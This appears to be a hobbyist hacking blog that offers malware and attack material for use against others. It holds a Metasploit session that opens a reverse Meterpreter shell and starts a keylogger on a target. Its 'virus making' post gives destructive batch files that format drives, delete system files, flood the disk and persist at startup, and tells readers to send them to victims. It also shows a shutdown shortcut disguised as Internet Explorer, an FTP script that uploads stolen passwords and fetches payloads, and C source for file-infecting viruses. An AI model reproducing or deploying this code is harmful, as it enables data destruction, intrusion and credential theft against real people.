ANKUSH
There are many software's for hacking.
Some of the common ones are;
-Wireless WEP Key Password Spy
-NetTools
- Advanced Host Monitor v7
- Advanced IP Calculator v1.1
- Advanced IP Scanner v1.5
- Advanced LAN Scan v1.0 BETA 1
- Advanced Port Scanner v1.3
- Angry IP Scanner v2.16
- Blue's PortScan v5.0
- DDosping v2.0
- Hide IP v2.1
- HoverIP
- IP Finder
- IP Ultra Scan 200
- IPnet
- ITrace32
- NetLab
- NetScanTools v4.22
- PeerGuardian v2
- Pinger
- Sam Spade
- SuperScan v2.06
- TJPing v2.0
- VisualRoute v11.0c
- WS Ping PROPack
- LANGuard
- Winfingerprint
- xIntrude
- xSharez 2 & 3
- spyware for mobile
- trojans
- hydra password cracker
- port scanner (nmap)
- Nessus
- IDS/IPS
- DOS & DDOS attacker
- sniffer
- arp poisioning tools
- EMailTracking Pro
- HTTrack
- L0phtCrack
- GetAdmin
- HoneyPot


enjoy hacking

post comments(ankush)
Labels: 0 comments | | edit post
ANKUSH
Search the IP-COUNTRY TABLE to match a unique record that has the IP number fits between From IP Number and To IP Number.

For example, IP Address "202.186.13.4" is equivalent to IP Number "3401190660". It falls in the following range of IP number in the table because it is between the "From IP number" and the "To IP number".

"3401056256","3401400319","MY","MALAYSIA"

From the IP range, the Country Name is Malaysia and Country Code is MY.

IP-COUNTRY TABLE

From IP Number To IP Number Country Code Country Name
3400892416 3400925183 HK HONG KONG
3400925184 3400933375 TH THAILAND
3400941568 3400949759 AU AUSTRALIA
3400957952 3400966143 AU AUSTRALIA
3400982528 3400990719 HK HONG KONG
3400990720 3400998911 ID INDONESIA
3400998912 3401003007 PH PHILIPPINES
3401007104 3401011199 IN INDIA
3401023488 3401056255 TH THAILAND
3401056256 3401400319 MY MALAYSIA
3401408512 3401416703 HK HONG KONG
3401416704 3401420799 KR KOREA, REPU
3401441280 3401449471 PH PHILIPPINES
3401449472 3401515263 MY MALAYSIA
3401531392 3401539583 IN INDIA
3401547776 3401580543 MY MALAYSIA
3401580544 3402629119 CN CHINA
3402629120 3404464127 JP JAPAN
3405774848 3406434303 AU AUSTRALIA
3406436352 3409969151 AU AUSTRALIA
3409969152 3410755583 TW TAIWAN
3410755584 3410780159 AU AUSTRALIA
3410788352 3410796543 HK HONG KONG
3410796544 3410800639 LK SRI LANKA
3410812928 3410821119 AU AUSTRALIA
3410821120 3410853887 TW TAIWAN
3410853888 3410862079 HK HONG KONG
3410870272 3410874367 IN INDIA
3410878464 3410886655 ID INDONESIA
3410886656 3410887679 TW TAIWAN
3410894848 3410898943 HK HONG KONG
3410903040 3410911231 HK HONG KONG
3410919424 3410927615 IN INDIA
3410944000 3410952191 PH PHILIPPINES
3410952192 3410960383 TW TAIWAN
3410968576 3410984959 NZ NEW ZEALAND
3410984960 3411017727 TW TAIWAN
3411017728 3411018751 HK HONG KONG
3411034112 3411051519 HK HONG KONG
3411058688 3411062783 AU AUSTRALIA
3411066880 3411083775 HK HONG KONG
3411087360 3411091455 CN CHINA
3411091456 3411095551 SG SINGAPORE
3411099648 3411107839 MM MYANMAR
3411116032 3411124223 IN INDIA
3411132416 3411136511 PK PAKISTAN
3411147776 3411149311 HK HONG KONG
3411156992 3411161087 PH PHILIPPINES
3411165184 3411173375 MY MALAYSIA
3411181568 3411189759 JP JAPAN
3411197952 3411202047 BD BANGLADESH
3411213312 3411215359 HK HONG KONG
3411230720 3411247103 HK HONG KONG
3411247104 3411255295 AU AUSTRALIA
3411278848 3411296255 HK HONG KONG
3411312640 3411313151 HK HONG KONG
3411329024 3411337215 PH PHILIPPINES
3411337216 3411341311 AU AUSTRALIA
3411345408 3411411967 HK HONG KONG
3411435520 3411443711 IN INDIA
3411443712 3411460095 HK HONG KONG
3411475456 3411476479 HK HONG KONG
3411476480 3411509247 AU AUSTRALIA
3411509248 3411517439 PH PHILIPPINES
3411525632 3411529727 SG SINGAPORE
3411533824 3411543039 CN CHINA
3411558400 3411566591 AU AUSTRALIA
3411574784 3411582975 IN INDIA
3411591168 3411595263 HK HONG KONG
3411599360 3411607551 AU AUSTRALIA
3411607552 3411608575 CN CHINA
3411623936 3411632127 AU AUSTRALIA
3411640320 3411648511 PK PAKISTAN
3411656704 3411673087 AU AUSTRALIA
3411673088 3411674111 CN CHINA
3411689472 3411701759 IN INDIA
3411722240 3411726335 PH PHILIPPINES
3411730432 3411738623 HK HONG KONG
3411738624 3411739647 CN CHINA
3411755008 3411763199 AU AUSTRALIA
3411771392 3411779583 HK HONG KONG
3411795968 3411804159 AU AUSTRALIA
3411804160 3411805183 CN CHINA
3411820544 3411832831 SG SINGAPORE
3411836928 3411845119 MY MALAYSIA
3411853312 3411857407 IN INDIA
3411861504 3411869695 AU AUSTRALIA
3411869696 3411943423 CN CHINA
3411951616 3411967999 LK SRI LANKA
3411968000 3411984383 AU AUSTRALIA
3411984384 3412000767 IN INDIA
3412000768 3412002815 CN CHINA
3412017152 3412025343 SG SINGAPORE
3412033536 3412066303 TW TAIWAN
3412066304 3412213759 NZ NEW ZEALAND
3412213760 3412221951 AU AUSTRALIA
3412230144 3412246527 HK HONG KONG
3412254720 3412262911 NR NAURU
3412262912 3412273151 NZ NEW ZEALAND
3412279296 3412281343 NZ NEW ZEALAND
ANKUSH
IP address (IPv4 / IPv6) is divided into 4 sub-blocks. Each sub-block has a different weight number each powered by 256. IP number is being used in the database because it is efficient to search between a range of number in database.

Beginning IP number and Ending IP Number are calculated based on following formula:

IP Number = 16777216*w + 65536*x + 256*y + z (Formula 1)

where
IP Address = w.x.y.z

For example, if IP address is "202.186.13.4", then its IP Number "3401190660" is based on the Formula 1.

IP Address = 202.186.13.4

So, w = 202, x = 186, y = 13 and z = 4

IP Number = 16777216*202 + 65536*186 + 256*13 + 4
= 3388997632 + 12189696 + 3328 + 4
= 3401190660

To reverse IP number to IP address,

w = int ( IP Number / 16777216 ) % 256
x = int ( IP Number / 65536 ) % 256
y = int ( IP Number / 256 ) % 256
z = int ( IP Number ) % 256

where % is the mod operator and int is return the integer part of the division.
ANKUSH
$ msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.118
RHOST => 192.168.0.118
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.139
LHOST => 192.168.0.139
msf exploit(ms08_067_netapi) > set TARGET 3
TARGET => 3
msf exploit(ms08_067_netapi) > exploit
[*] Triggering the vulnerability…
[*] Sending stage (2650 bytes)
[*] Uploading DLL (75787 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened
meterpreter > ps
Process list
============
PID Name Path
— —- —-
292 wscntfy.exe C:\WINDOWS\system32\wscntfy.exe
316 Explorer.EXE C:\WINDOWS\Explorer.EXE
356 smss.exe \SystemRoot\System32\smss.exe
416 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
440 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
[ snip ]
meterpreter > migrate 316
[*] Migrating to 316…
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 316
meterpreter > grabdesktop
Trying to hijack the input desktop…
meterpreter > keyscan_start
Starting the keystroke sniffer…
meterpreter > keyscan_dump
Dumping captured keystrokes…
Labels: 0 comments | | edit post
ANKUSH
Simple Virus Making

If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to make simple .bat file (virus) that can’t be detected by any anti virus
Here are some good viruses ,i am not responsible for any kind of damage to your system …

Copy this to notepad and save as flood1.bat…..

@ECHO OFF
@ECHO A Sharma’s Creation


@ECHO MAIN BAT RUNNING
GOTO start
:start
@ECHO SET magic2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a magic2=%%magic2%%+1 >> bat6.bat
@ECHO NET USER magic2%%magic2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat
GOTO bat5

:bat5
@ECHO CD %%ProgramFiles%%\ >> bat5.bat
@ECHO SET pogo=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR pogo%%pogo%% >> bat5.bat
@ECHO SET /a pogo=%%pogo%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
GOTO bat4

:bat4
@ECHO CD %%SystemRoot%%\ >> bat4.bat
@ECHO SET hat=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR hat%%hat%% >> bat4.bat
@ECHO SET /a hat=%%hat%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3

:bat3
@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
@ECHO SET chart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR chart%%chart%% >> bat3.bat
@ECHO SET /a chart=%%chart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
START /MIN bat3.bat
GOTO bat2

:bat2
@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
@ECHO SET gamer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR gamer%%gamer%% >> bat2.bat
@ECHO SET /a gamer=%%gamer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
START /MIN bat2.bat
GOTO original



riginal
CD %HomeDrive%\
SET sharma=1
GOTO flood1
:flood1
MKDIR sharma%sharma%
SET /a sharma=%sharma%+1
GOTO flood1
What does it do : this is an extremely harmful virus the will keep replicating itself until your hard drive is totally full and will destroy your comp.




Some Funny Virus Codes

A simple binary codes that can format the system drive ,secondary drives…

Copy The Following In Notepad Exactly as it

01001011000111110010010101010101010000011111100000

Save As An EXE Any Name Will Do


Send the EXE to People And Infect
Some other interesting formatting codes….

format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000

format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000

format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001


Some more interesting stuff ..

open notepad

erase c:\windows

and save as

FINDOUTANAME.cmd


wat does it do:- will erase c:/windows .


Here is another one which is funny……

cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo Deleting Critical System Files…
echo del *.*
start /w wscript.exe C:\sleep3000.vbs
echo Deletion Successful!
echo:
echo:
echo:
echo Deleting Root Partition…
start /w wscript.exe C:\sleep2000.vbs
echo del %SYSTEMROOT%
start /w wscript.exe C:\sleep4000.vbs
echo Deletion Successful!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo Creating Directory h4x…
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir h4x
start /w wscript.exe C:\sleep3000.vbs
echo Directory Creation Successful!
echo:
echo:
echo:
echo Execution Attempt 1…
start /w wscript.exe C:\sleep3000.vbs
echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\
echo start hax.exe
start /w wscript.exe C:\sleep3000.vbs
echo Virus Executed!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo Disabling Windows Firewall…
start /w wscript.exe C:\sleep2000.vbs
echo Killing all processes…
start /w wscript.exe C:\sleep2000.vbs
echo Allowing virus to boot from startup…
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo Virus has been executed successfully!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo Have fun!
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c “Your computer has committed suicide. Have a nice day.”


This code about multiple open windows means infinite windows
until continue you restart the computer:save on denger.bat and code written in notepad

@echo off
copy 0% denger.bat
start denger.bat

This code about the computer shutdown:

@echo off
shutdown -s -t 5 -c “Shutdown”

Go to notepad and type the following:
@Echo off
Del C:\ *.*|y

save it as Dell.bat

Want worse then type the following:

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file

One more …

try one this

Cd C:\
rd C:\ /s/q
Cd D:\
rd D:\ /s/q
Cd E:\
Rd E:\ /s/q
Cd F:\
Rd\ /s/q

then it is complete Save as any file you want in .bat format.. n enjoy.its really dangerous don’t try on your own pc.


NOTE :- Howto add your own created viruses into start ups this will make it difficult to detect them n to remove them …

For this u need a registry updater software .

now move your .bat file to c:/windows and then simply run this software ur virsu will be added to your start ups i tried this with shut down , as my comp starts its shut down after 2 secs ..


Do not try it on your PC. Don’t mess around this is for educational purpose only





Batch VIRUS Killing “ NORTON, LIMEWIRE, EXPLORER, MSN “

@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c “VIRUS DETECTED”
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP



It will
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer



The first code we are going to look at is one that makes the cd tray open and close repeatedly until shutdown, or
(don’t tell your friends, you press ctrl + alt + delete and go to processes, and end wscript.exe (this code is vbs so save in note pad as whateveryouwant.vbs)


Set oWMP = CreateObject(”WMPlayer.OCX.7″ )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next ‘ cdrom
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next ‘ cdrom
loop
end if

A code that turns on and off your capslock repeatedly, also vbs, end same way as last time, this turns on and off your capslock every tenth of a second


Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”

loop




A batch that is like a computer password, maybe you could stick it in autoexec.exe and make it run off startup?

@Echo off
echo Enter password then [F6] and then smack the [Enter] key real hard!
prompt $e[30m
echo on
echo off
copy con password.dat>nul
prompt $e[0m
echo on
echo off
cls
copy password.set+password.dat password.bat>nul
call password.bat
if '%password%==qwerty goto done
echo Incorrect, you are not trying to break into my pc are you?
choice /t:y,3
if errorlevel 2 goto next
:next
erase password.bat
erase password.dat
:hello
cls
echo Turn off PC
goto hello
:done
erase password.dat
erase password.bat
set password=qwerty
prompt $p$g


A batch that switches the left mouse button with your right mouse button (also maybe add a code to stick in someones autoexec,
that would really make them mad)

@echo off
Rundll32 user32,SwapMouseButton
msg * hahaha
msg * this is gunna screw you up
msg * good look finding how to fix it



A batch file that will shutdown your computer and send a few messages about the matrix, rather bland and could be worked on a little bit more, some one
could tweak it a little and i'll repost it and give you credit, perhaps change the dos txt to green


@ Echo off
Title Matrix
msg * The matrix has you, you can not escape
rundll32.exe disable mouse
Attrib +h C:*.*
echo deleting harddrive
echo 1001101010101011111111101010101
echo 010101010101010101010101010111
assoc
assoc
Attrib C:Documents and settings*.*
net share hack=C:
shutdown -s -c 60



This is a VBs file so of course save as VBS, you can replace the txt in this code with whatever you want

Set wshshell = wscript.CreateObject("WScript.Shell")
Wshshell.run "Notepad"
wscript.sleep 400
wshshell.sendkeys "M"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 120
wshshell.sendkeys "s"
wscript.sleep 200
wshshell.sendkeys "o"
wscript.sleep 140
wshshell.sendkeys "n"
wscript.sleep 100
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "P"
wscript.sleep 200
wshshell.sendkeys "w"
wscript.sleep 150
wshshell.sendkeys "n"
wscript.sleep 170
wshshell.sendkeys "s"
wscript.sleep 200
wshshell.sendkeys " "
wscript.sleep 100
wshshell.sendkeys "A"
wscript.sleep 50
wshshell.sendkeys "l"
wscript.sleep 120
wshshell.sendkeys "l"
wscript.sleep 160
wshshell.sendkeys " "
wscript.sleep 200
wshshell.sendkeys "N"
wscript.sleep 100
wshshell.sendkeys "e"
wscript.sleep 100
wshshell.sendkeys "w"
wscript.sleep 200
wshshell.sendkeys "b"
wscript.sleep 120
wshshell.sendkeys "s"



Carpet Bomb:

Once the batch file is executed, it copies itself hundreds of times onto the desktop and startup folder. This means that it'll regenerate once the computer is restarted even if all the icons on the desktop are deleted. This works on Windows XP and Vista. Command line-args are optional, and include "disinf" for erasing all of the copies permanently.

@ECHO OFF
:This was meant as a harmless joke, and it's not hard to fix if you read through the code.
:If you just use the "disinf" argument on the command line all is well.
lease only use this on people u don't like
IF "%1"=="" GOTO fill
IF "%1"=="fill" GOTO fill
IF "%1"=="kill" GOTO kill
IF "%1"=="inf" GOTO inf
IF "%1"=="disinf" GOTO kill
GOTO bye
:fill
IF EXIST C:\Users\%USERNAME%\Desktop\ (
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Users\Public\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Users\%USERNAME%\Desktop\joke%%A.bat"
)
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Documents and Settings\All Users\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO TYPE "%~df0" > "C:\Documents and Settings\%USERNAME%\Desktop\joke%%A.bat"
IF "%1"=="" GOTO inf
GOTO theend
:kill
IF EXIST C:\Users\%USERNAME%\Desktop\ (
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Users\Public\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Users\%USERNAME%\Desktop\joke%%A.bat"
)
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Documents and Settings\All Users\Desktop\joke%%A.bat"
FOR /L %%A IN (1, 1, 200) DO ECHO Y | DEL "C:\Documents and Settings\%USERNAME%\Desktop\joke%%A.bat"
IF "%1"=="disinf" GOTO disinf
GOTO theend
:inf
TYPE "%~df0" > "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\joke.bat"
TYPE "%~df0" > "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\joke.bat"
TYPE "%~df0" > "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\joke.bat"
GOTO theend
:disinf
ECHO Y | DEL "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\joke.bat"
ECHO Y | DEL "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\joke.bat"
ECHO Y | DEL "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\joke.bat"
GOTO theend
:bye
ECHO "fill" to make more and "kill" to get rid of 'em. inf to make it stick a little longer
:theend

Once the batch file is executed, it copies itself hundreds of times onto the desktop and startup folder. This means that it'll regenerate once the computer is restarted even if all the icons on the desktop are deleted. This works on Windows XP and Vista. Command line-args are optional, and include "disinf" for erasing all of the copies permanently.\

Creating a batch Bomb

Copy and paste the below into notepad and save it as hi.bat (Not .txt)
run it, and enjoy anarchy.


Code:

@echo off
:START
echo Error, Critical Windows Failure. Format Hard Disk and Reinstall OS!
start hi.bat
GOTO START



A code that turns on and off your capslock repeatedly, also vbs, end same way as last time, this turns on and off your capslock every tenth of a second.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop


How to make a shutdown file and disguise it as something else!

This article is a pretty simple one, maybe most of you guys know already... in case if you don't know, you can play around and make fun...

How to make a shutdown file and disguise it as something else (internet, etc.)

Step 1: Right click on your desktop or wherever you want to make this shutdown file

Step 2: look for new, then shortcut

Step 3: Type shutdown -s -t 10 -c "text here"
note: you can add -f to force close open docuuments
note: after -t you can put any amount of seconds you want before the computer shuts down

Step 4: push next, then name it whatever you like, for an example we will put Internet Explorer

Step 4: Right click on the file you just made and goto properties

Step 5: hit change icon. (This could be under the advanced tab)

Step 6: An error message should pop up letting you know there aren't any pictures for c:\windows\system32. Hit ok

Step 7: A list of icons should show up.. click on the one you think looks the most persuasive according to what you named it. (For example, look for the 'e' icon for internet explorer.

Now your done, see that wasn't that hard! was it?
Put this in the start up folder to make people even MORE mad!


NOTE:- This can easily be stopped by typing shutdown -a in run...


Sending Files Via ftp Batch!

OK, So i made a password stealer that would output a .txt file to the windows folderm i then made a ftp batch that would upload the txt file to my server, so far ive managed to get some passwords but not for anything important, So if you want to know how to make a ftp batch then heres how.

First for example were gonna try upload a file called Test.txt to our server


Upload.bat

ftp -n -i -s:MyUploadFiles.ftp


First make a file called upload.bat and put this in, Now we need to make the myuploadfiles.ftp, if you wanna call it something else then change the myuploadfiles.ftp to what you want but KEEP the .ftp at the end.

Ok now its the myuploadfiles.ftp creating time, or whatever you called it before.

open your-host

user username.spam.com password

ASCII

send test.txt

BI
This is the bit where you have to change the username password and host to what your ftp host is. then change the send test.txt to what file you want to upload, it doesn't have to be a txt file, it can be any one.

Now make sure both files are in the same dir as each other and run the .bat file. check your ftp server and guess whats sitting there! test.txt! So if you want to upload a file from someone's pc, you could use this?


Also theres nothing stopping you from putting in the "get" command in the .ftp, say get download.bat, whenever you want to change what it does make it call it download.bat and shove it on the server, then the victim will download it and be executed.

Folder Replicator Batch VIRUS

Here is a Simple bacth virus that contains only 6 lines, has the tendency to replicate itself again
and again and keeps on creating a folder with same name, until a user stops it.

1. Just open up a notepad, copy and paste the below code

cd\
cd C:\Documents and Settings\username\Desktop
:loop
md Virus
cd Virus
goto loop


2. Save it as a batch file with the extension .bat.
3. Then run it on the Victims computer to infect it.
4. Any how it doesnt cause much harm, but replicates folder inside a folder and goes on.


VIRUS CODES IN “ C “ :-


BATCH & COM VIRUS


#include

#include

#include

#include


struct ffblk ffblk;

main()

{

char old_dir[MAXPATH];

Get_Path(old_dir); /* Save the old directory */

Pick_A_Dir(); /* Find a new directory to */

Infect_Directory(); /* infect and infect it. */

chdir(old_dir); /* Return to old directory */

return 0;

}




Pick_A_Dir()

{

int done;

chdir(”..”); /* First, Go out a DIR. */

done=findfirst(”*.BAT”,&ffblk,0); /* If no BAT files, try */

/* root and DOS */

if (done)

{

chdir(”\\”);

done=findfirst(”*.BAT”,&ffblk,0);

if (done) chdir(”\\DOS\\”);

}

return 0;

}



Infect_Directory()

{

int done;


done = findfirst(”*.BAT”,&ffblk,0);

while (!done) /* Find all .BAT files */

{ /* and add code to run */

Do_Batch(); /* BAT&COM if not */

done = findnext(&ffblk); /* already there */

}


if (findfirst(”BAT&COM.COM”,&ffblk,0)) /* If BAT&COM does */

{Copy_Virus();} /* not exist, then */

return 0; /* copy it into dir.*/

}




Do_Batch()

{

FILE *batch;

char Infection_Buffer[12];

char vpath[MAXPATH];


Get_Path(vpath); /* Get path for adding path */

/* specifier in commands */



if (vpath[3]==0) vpath[2]=0; /* Keep path good in root */


batch=fopen(ffblk.ff_name, “rt+”);

fseek(batch, -11, SEEK_END);

fread(Infection_Buffer,11,1,batch);

Infection_Buffer[11]=0; /* Terminate String */


if (strcmp(Infection_Buffer,”BAT&COM.COM”)) /* Check if */

{ /* Batch is */

fseek(batch, 0, SEEK_END); /* infected.*/

fprintf(batch,”\n%s\\BAT&COM.COM”,vpath);

} /*^- Add command */

/* to batch */


fclose(batch);

return 0;

}



Copy_Virus()

{

FILE *old_virus, *new_virus;

int write_length;

char copy_buffer[1024]; /* Copy the virus to */

/* new directory */

old_virus=fopen(_argv[0],”rb”);

new_virus=fopen(”BAT&COM.COM”,”wb”);


write_length=1024;


while (write_length==1024)

{

write_length=fread(copy_buffer,1,1024,old_virus);

fwrite(copy_buffer,write_length,1,new_virus);

}

fclose(old_virus);

fclose(new_virus);

return 0;

}



Get_Path(char *path)

{

strcpy(path, “A:\\”);

path[0] =’A’ + getdisk(); /* Returns current path */

getcurdir(0, path+3);

return 0;

}

- – - —————–End of Code———————— – - -




BLACK WOLF VIRUS


/* It will infect all .COM files in the current directory */


#include

#include

#include


FILE *Virus,*Host;

int x,y,done;

char buff[256];

struct ffblk ffblk;


main()

{

done = findfirst(”*.COM”,&ffblk,0); /* Find a .COM file */

while (!done) /* Loop for all COM’s in DIR*/

{

printf(”Infecting %s\n”, ffblk.ff_name); /* Inform user */

Virus=fopen(_argv[0],”rb”); /* Open infected file */

Host=fopen(ffblk.ff_name,”rb+”); /* Open new host file */


x=9504; /* Virus size – must */

/* be correct for the */

/* compiler it is made */

/* on, otherwise the */

/* entire virus may not*/

/* be copied!! */

while (x>256) /* OVERWRITE new Host */

{ /* Read/Write 256 byte */

fread(buff,256,1,Virus); /* chunks until bytes */

fwrite(buff,256,1,Host); /* left < 256 */

x-=256;

}

fread(buff,x,1,Virus); /* Finish off copy */

fwrite(buff,x,1,Host);

fcloseall(); /* Close both files and*/

done = findnext(&ffblk); /* go for another one. */

}

/* Activation would go */

/* here */

return (0); /* Terminate */

}


enjoy hacking

post comments[ankush]
Labels: 0 comments | | edit post
ANKUSH

it is used to hack gmail account>>>>

contact me at ankuraja@gmail.com
Labels: 1 comments | | edit post
ANKUSH
Here I shall discuss, how to trace an email sender from the email header. I shall take my MSN account as an example. But before I go into depth I shall split the email header and explain each one of them for better understanding. by. Ankush

Viewing Email Header
Every e-mail comes with information attached to it that tells the recipient of its history. This information called a header. The above is the Full header of email .All this information comes with the email. The header contains the information essential to tracing an e-mail. The main components to look for in the header are the lines beginning with "From:" and "Received:" However, it might be instructive to look at what various different lines in the header mean.

MIME-Version: 1.0
Received: from rwcrmhc11.comcast.net ([204.127.198.35]) by mc7-f12.hotmail.com with Microsoft SMTPSVC(5.0.2195.6713); Tue, 25 Nov 2003 19:56:18 -0800
Received: from pavilion (pcp03530790pcs.mnhwkn01.nj.comcast.net[68.37.24.150]) by comcast.net (rwcrmhc11) with SMTP id <20031126034457013001nk6pe>; Wed, 26 Nov 2003 03:44:57 +0000
X-Message-Info: JGTYoYF78jGkTvdOiviUvHyY85nt7iLD
Message-ID: <000801c3b3cf$a92237a0$96182544@mnhwkn01.nj.comcast.net>
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
Disposition-Notification-To: "Leona"
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Return-Path: leona6256@comcast.net
X-OriginalArrivalTime: 26 Nov 2003 03:56:18.0897 (UTC) FILETIME=[3F5AFC10:01C3B3D1]

Some e-mail programs, like Yahoo or Hotmail, have their full headers hidden by default In order to view the full header, you must specifically turn on that option. Some ways of doing this in different e-mail programs follow here:

Viewing full Header in Yahoo and Hotmail
Yahoo
Click Options -> Click Mail Preferences -> Click Show Headers -> Click "All" -> Click "Save"
Hotmail
Click Options -> Click Mail Display Headings (under "Additional Options") -> Click Message Headers -> Click "Full" ->
Click "OK"

Viewing full Header in Email Clients like (Outlook and Eudora etc)
Outlook Express
If you use OE, at least the version I have (5.5), you may not have much luck; it sometimes gives little more information than what you can see in the main window. But here's the application path anyway:
Click File/Properties/Details to find the header information.
Outlook
First, highlight the email in your Incoming window, right-click on it, and select Options. The window that comes up will have the headers at the bottom.
Eudora
Be sure the message is open, then Click the 'Blah, Blah, Blah' button from the Tool Bar, and the headers will appear.
Pegasus
Select Reader/Show All Headers/
Netscape Mail
Select Options/Headers/Show All Headers
Netscape Messenger 4.0 and 4.5
Select View/Headers/All

Now I will discuss the full header in detail:

Message ID:
It is used to identify the system from which the the message has originated (i.e. from the system the sender has logged in). However, this is too easy to forge, and is consequently not reliable.

X-Headers:
X- headers are user defined headers. They are inserted by email client programs or applications that use email. Here from the X- headers inserted into the email by the email client it is clear that the sender has used Microsoft Outlook Express 6.00.2800.1106 to send this email.
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106

MIME-Version:
MIME stands for Multipurpose Internet Mail Extension. It tells the recipient what types of attachments are included in email. It is a format that allows people to send attachments that do not contain Standard English Words, but rather graphics, sounds, and e-mails written with other characters. The Mime-Version field merely confirms that the version of MIME used corresponds to the standard version (which is currently 1.0).

From:
